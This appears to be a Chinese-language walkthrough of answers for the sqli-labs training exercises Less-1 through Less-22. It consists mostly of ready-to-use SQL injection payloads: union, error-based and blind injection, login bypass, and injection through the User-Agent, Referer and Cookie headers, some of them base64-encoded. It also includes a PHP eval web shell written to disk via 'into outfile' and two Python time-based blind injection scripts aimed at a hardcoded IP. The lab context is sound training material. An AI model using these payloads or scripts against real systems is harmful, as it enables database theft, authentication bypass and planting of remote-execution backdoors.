[sqli-labs]Less1~22答案

Less-1
?id=1' order by 3
#正常
?id=1' order by 4
#Unknown column '4' in 'order clause'
?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+
# information_schema,challenges,mysql,performance_schema,security

?id=666' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 'security') --+
# emails,referers,uagents,users
?id=666' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 'users') --+
# id,username,password
?id=666' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+

# Dumb,Angelina,   Dummy,  secure,stupid,   superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
# Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Less-2
# 方法同上,不過此題爲數值查詢
?id=666 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)
Less-3
?id=666') union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+ 
Less-4
?id=666") union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+ 
Less-5
# 頁面沒有顯示位，無法使用聯合查詢注入，採用報錯注入
# and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
?id=1' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Subquery returns more than 1 row
?id=1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'security;1' for key 'group_key'
?id=1' and (select 1 from (select count(*),concat(((select concat(table_name,";") from information_schema.tables where table_schema = 'security' limit 3, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'users;1' for key 'group_key'
# 以此類推
Less-6
# 把'換成"
Less-7
?id=-1')) union select "<?php @eval($_POST['my']);?>" into outfile "path" --+
# 一句話連上即可
Less-8
# '))改爲'
Less-9&10
#區別是前者'後者"
#經過測試發現本題是時間盲注,附上腳本:
# coding:utf-8
import requests
import datetime


def database_len(url):
    """Return the inferred length of the current database name.

    Sends one GET per candidate length ``i`` in 1..9 to ``url``. The
    query string carries a conditional ``sleep(1)`` that only fires while
    the real length is greater than ``i``, so the verdict for each probe
    is nothing but the whole-seconds round trip. The first probe that
    comes back in under a second ends the scan and its ``i`` is taken as
    the length; if all nine are slow the loop runs out and 9 is returned.
    Every candidate is printed as it is tested, then the final value.
    """
    probe = "?id=1' and if(length(database())>%s,sleep(1),0)"
    for i in range(1, 10):
        started = datetime.datetime.now()
        requests.get(url + probe % i + '%23')
        elapsed = (datetime.datetime.now() - started).seconds
        print(i)
        if elapsed < 1:
            break
    print('database_len:', i)
    return i


def database_name(url, database_len):
    """Print the current database name, recovered one position at a time.

    For each position ``j`` in 1..database_len the 36 characters ``0-9a-z``
    are tried in order with one GET each. The probe sleeps one second only
    when the guessed character matches, so the first guess whose round
    trip reaches a whole second is accepted and the partial name printed.
    A position where no guess triggers the delay is skipped silently, so
    the printed name can be shorter than ``database_len``. Returns None;
    the result is only printed.
    """
    alphabet = '0123456789abcdefghijklmnopqrstuvwxyz'
    template = "?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)"
    name = ''
    for position in range(1, database_len + 1):
        for guess in alphabet:
            started = datetime.datetime.now()
            requests.get(url + template % (position, guess) + '%23')
            if (datetime.datetime.now() - started).seconds < 1:
                continue
            name += guess
            print(name)
            break
    print('database_name:', name)


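# Base URL of the lab instance (Less-9); the probes append their query string.
url = '''http://43.247.91.228:84/Less-9/'''
# Keep the measured length under its own name. The original rebound
# `database_len` itself to the int, which replaced the function for the
# rest of the module and made a second call a TypeError.
db_len = database_len(url)
database_name(url, db_len)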
#database_name: security
Less-11
?uname=' or '1'='1&passwd=1'union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#' or '1'='1繞過
Less-12
?uname=") or ("1")=("1&passwd=1")union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#") or ("1")=("1繞過
Less-13
?uname=1') and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  #
#>XPATH syntax error: ':security'
或者
?uname=1') and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a)  #
# Duplicate entry 'security | 1' for key 'group_key'
Less-14
把')換成"
Less-15
#沒有啥反應哈,試了試萬能密碼確定是',然後進行時間盲注,對之前的腳本做了個升級哈,這次是多線程
# coding:utf-8
import requests
import datetime
import threading


def database_len(url, i):
    """Return True when the database name is longer than ``i`` characters.

    Issues a single POST to the login form at ``url``. The ``uname`` field
    carries a conditional ``sleep(2)`` that fires only while
    ``length(database()) > i``; ``passwd`` is a fixed ``'1'``. The verdict
    is purely whether the measured round trip, in whole seconds, reaches 2.
    """
    form = {
        'uname': "admin' and if(length(database())>%s,sleep(2),0) #" % i,
        'passwd': '1',
    }
    started = datetime.datetime.now()
    requests.post(url, data=form)
    elapsed = (datetime.datetime.now() - started).seconds
    return elapsed >= 2


def database_name(url, j):
    """Return the character at 1-based position ``j`` of the database name.

    Tries ``0-9a-z`` in order, one POST to the login form per guess. The
    probe sleeps two seconds only when the guess matches, so the first
    guess whose round trip reaches 2 whole seconds is returned. Falls
    through to None when no guess triggers the delay; the caller in
    main() does ``name += ...`` on that value and then raises TypeError.
    """
    template = "admin' and if(substr(database(),%d,1)='%s',sleep(2),1) #"
    for guess in '0123456789abcdefghijklmnopqrstuvwxyz':
        form = {'uname': template % (j, guess), 'passwd': '1'}
        started = datetime.datetime.now()
        requests.post(url, data=form)
        if (datetime.datetime.now() - started).seconds >= 2:
            return guess
    return None


class MyThread(threading.Thread):
    """Thread that runs ``func(*args)`` and keeps the return value.

    ``threading.Thread`` discards its target's result; this subclass stores
    it on ``self.res`` so the caller can read it back after ``join()``.
    """

    def __init__(self, func, args):
        super().__init__()
        self.func = func
        self.args = args

    def run(self):
        # Executed on the new thread by start(); the only side effect is
        # publishing the return value through self.res.
        self.res = self.func(*self.args)

    def getresult(self):
        # Valid only once run() has finished (i.e. after join()); before
        # that self.res has never been assigned and this raises AttributeError.
        return self.res


def main():
    """Drive the two probes: find the name length, then read each character.

    Phase 1 launches nine ``database_len`` threads (candidates 1..9) at once
    and joins them in ascending order; the first candidate reported as not
    exceeded is taken as the length. If every candidate comes back True
    (a name of 10 or more characters) ``flag`` is never cleared and the
    ``while`` simply repeats the whole batch. Phase 2 launches one
    ``database_name`` thread per position and concatenates the results in
    position order. Everything is printed; nothing is returned.
    """
    flag = True
    url = '''http://43.247.91.228:84/Less-15/'''
    while flag:
        threads = []
        for i in range(0, 9):
            # Thread i asks "is the length greater than i + 1?".
            t = MyThread(database_len, (url, i + 1))
            threads.append(t)
            threads[i].start()
        for i in range(0, 9):
            # Joined in ascending order, so the first False is the smallest
            # candidate that is not exceeded, i.e. the exact length.
            threads[i].join()
            if not threads[i].getresult():
                flag = False
                databaselength = i + 1
                print('database_len:', databaselength)
                break
    threads = []
    name = ''
    for i in range(0, databaselength):
        # substr() positions are 1-based, hence i + 1.
        t = MyThread(database_name, (url, i + 1))
        threads.append(t)
        threads[i].start()
    for i in range(0, databaselength):
        threads[i].join()
        # getresult() is None when no character matched at that position;
        # "+=" then raises TypeError, so the run aborts instead of printing
        # a partial name.
        name += threads[i].getresult()
    print("database_name :" + name)


if __name__ == '__main__':
    # Only run the probes when executed directly; importing the module just
    # defines the functions without issuing any request.
    main()

#database_len: 8
#database_name :security
Less-16
'改成")
Less-17
#嘗試了一會兒發現這裏只有知道用戶名才能進行注入哈,隨便試了個admin發現可以,在密碼發現有語法報錯,於是採用報錯注入
?uname=admin&passwd=1' and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a)  #&submit=Submit
Less-18
#發現頁面會返回ip和user-agent,改了下XFF發現不行呀,於是嘗試在user-agent注入
User-Agent:1' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  and '1'='1
# XPATH syntax error:':security'
Less-19
#顯示位在referer,所以嘗試在這裏注入
Referer:1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
uname=admin&passwd=admin&submit=Submit
#"security;1"
Less-20
#在cookie裏面注入
Cookie: uname=' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  and '1'='1
Less-21
Cookie: uname=JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICcxJz0nMQ==
# 觀察了一下要base64,這種形式還是第一次見2333
Less-22
#和上題一樣哈,不過把'改成"
Cookie: uname=IiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICIxIj0iMQ==